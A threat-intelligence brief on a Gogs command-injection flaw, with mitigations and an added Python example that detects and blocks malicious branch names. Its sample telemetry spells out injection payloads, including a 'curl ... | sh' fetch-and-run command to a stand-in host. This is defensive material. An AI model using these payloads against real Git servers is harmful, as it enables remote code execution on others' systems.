CVE-2026-52806 — Gogs self-hosted Git server: argument injection to OS command execution (BSI critical batch)
From CTI Daily Brief — 2026-06-20 · published 2026-06-20
BSI advisory WID-SEC-2026-2013 (rated kritisch, 2026-06-19) consolidates a batch of more than 20 CVEs in the Gogs self-hosted Git server (BSI CERT-Bund, 2026-06-19). The most severe, CVE-2026-52806 (CWE-77 command injection; CVSS 4.0 9.4 per BSI, CVSS 3.1 9.9 per the GitHub advisory), is an argument injection: a user crafts a branch name containing the Git --exec flag, Gogs passes that name unsanitised as a positional argument to git rebase, git parses it as an option, and the attacker's command runs as the Gogs process owner whenever a rebase is triggered.

Because Gogs ships with open self-registration enabled and no repository-count limit by default, the "authenticated" prerequisite is effectively eliminated on default-configured internet-exposed instances (GitHub Security Advisory GHSA-qf6p-p7ww-cwr9). Gogs is common in EU research institutions, universities and smaller public-sector IT teams as a lightweight Git host.

All issues are fixed in Gogs 0.14.3, released 2026-06-07; the BSI consolidation follows a May 2026 disclosure made while the bugs were still unpatched.

Actions: upgrade to 0.14.3; set [service] DISABLE_REGISTRATION = true if registration is not required; run the Gogs process under a minimal-privilege account with no login shell (this limits what an attacker can do afterwards rather than preventing the injection itself, since git runs --exec commands through sh -c regardless of the account's login shell); and hunt for git child processes of the Gogs server carrying --exec (or its short form -x) arguments.
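The last two actions, the argv guard against the injection and the hunt for --exec in git child processes, as an added Python example. This is not code from Gogs, BSI or the GitHub advisory, and the guard illustrates the general fix for this class of argument injection rather than the actual 0.14.3 patch. The process-event shape (pid, ppid, comm, argv as JSON lines), the parent PID 900 standing in for the Gogs server, and every sample command are constructed for the example.

```python
"""Added example (not Gogs project code): hunt for `git rebase --exec`
children in process-exec telemetry, and build a git argv that cannot be
hijacked by a ref name. Event shape {pid, ppid, comm, argv} is assumed."""
import json
import re
import shlex

# Constructed sample events, not real telemetry. ppid 900 is assumed to be the
# gogs server process; argv is what execve() actually received.
SAMPLE_EVENTS = [
    {"pid": 4101, "ppid": 900, "comm": "git", "argv": ["git", "rebase", "main", "feature/login"]},
    {"pid": 4102, "ppid": 900, "comm": "git", "argv": ["git", "rebase", "main", "--exec", "id > /tmp/o"]},
    {"pid": 4103, "ppid": 900, "comm": "git", "argv": ["git", "rebase", "main", "--exec=curl 198.51.100.7/p|sh"]},
    {"pid": 4104, "ppid": 900, "comm": "sh", "argv": ["sh", "-c", "git rebase main -x 'id > /tmp/o'"]},
    {"pid": 4105, "ppid": 900, "comm": "git", "argv": ["git", "rebase", "main", "--", "--exec=id"]},
    {"pid": 4106, "ppid": 1, "comm": "git", "argv": ["git", "log", "--oneline", "-5"]},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]  # JSON-lines form a collector would emit

SHELLS = {"sh", "bash", "dash", "zsh"}


def exec_payload(argv):
    """Return the command handed to `git rebase` via --exec / -x, or None.
    Only tokens before a bare `--` count: git's option parser stops there,
    so anything after it is a positional ref name, never a flag."""
    if len(argv) < 2 or argv[0].rsplit("/", 1)[-1] != "git" or argv[1] != "rebase":
        return None
    opts = argv[2:]
    if "--" in opts:
        opts = opts[: opts.index("--")]
    for i, tok in enumerate(opts):
        if tok in ("--exec", "-x") and i + 1 < len(opts):   # separate-value form
            return opts[i + 1]
        if tok.startswith("--exec="):                        # --exec=<cmd>
            return tok[len("--exec="):]
        if tok.startswith("-x") and not tok.startswith("--") and len(tok) > 2:
            return tok[2:]                                   # -x<cmd> attached form
    return None


def candidate_argvs(event):
    """Yield the argv vectors worth inspecting: the process's own, plus the
    command string when the event is a `sh -c '...'` wrapper."""
    argv = event["argv"]
    yield argv
    if event["comm"] in SHELLS and len(argv) >= 3 and argv[1] == "-c":
        try:
            yield shlex.split(argv[2])
        except ValueError:
            pass


def hunt(lines, gogs_pid=None):
    """Scan JSON-lines exec events; return [(pid, payload)] for every
    `git rebase` carrying an --exec/-x command. With gogs_pid set, only
    direct children of that process are considered."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if gogs_pid is not None and ev["ppid"] != gogs_pid:
            continue
        for argv in candidate_argvs(ev):
            payload = exec_payload(argv)
            if payload is not None:
                hits.append((ev["pid"], payload))
                break
    return hits


# Subset of the rules git check-ref-format enforces; the leading '-' check is
# the one that matters for argument injection, the rest are defence in depth.
_BAD_REF = re.compile(
    r"[\x00-\x20\x7f~^:?*\[\\]"      # control chars, space, forbidden punctuation
    r"|\.\.|@\{|//|^/|/$|\.$|^@$"    # '..', '@{', empty component, trailing '/' or '.'
    r"|(^|/)\.|\.lock(/|$)"          # component starting with '.' or ending in '.lock'
)


def validate_branch_name(name):
    """Raise ValueError for names git itself refuses for a branch."""
    if not name or name.startswith("-") or _BAD_REF.search(name):
        raise ValueError(f"invalid branch name: {name!r}")
    return name


def rebase_argv(upstream, branch):
    """Server-side argv for a rebase: validated names placed after a `--`
    terminator, so even a name that slipped past validation cannot be
    parsed as an option (hypothetical hardened form, not Gogs' code)."""
    return ["git", "rebase", "--", validate_branch_name(upstream), validate_branch_name(branch)]


if __name__ == "__main__":
    for pid, cmd in hunt(SAMPLE_LINES, gogs_pid=900):
        print(f"pid {pid}: git rebase --exec payload {cmd!r}")
    print(rebase_argv("main", "feature/login"))
```

Events 4102, 4103 and the `sh -c` wrapper 4104 are reported; 4105 is not, because its `--exec=id` sits after `--` and git would treat it as a ref name. Run against real execve telemetry, the parent-PID filter is what keeps the rule quiet: a `git rebase -x` typed by a developer on the same host has a different parent than the Gogs server.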
CVE Summary Table
| CVE | Product | CVSS | EPSS | KEV | Exploited | Patch | Source |
|---|---|---|---|---|---|---|---|
| CVE-2026-12569 | PTC Windchill / FlexPLM | 10.0 (v3.1) / 9.3 (v4.0) | n/a | No | Yes (BSI/NCSC-CH confirmed) | 12.1.2.27 / 13.0.2.12 / 13.1.2.8 / 13.1.3.4 (2026-06-15) | Heise |
| CVE-2026-40624 | AVer PTC500S/PTC115/PTC500+/PTC115+ cameras | 9.8 (v3.1) | n/a | No | Unknown | Firmware update (all models) | CISA |
| CVE-2026-52806 | Gogs self-hosted Git server | 9.4 (v4.0) | n/a | No | Not observed | 0.14.3 (2026-06-07) | BSI |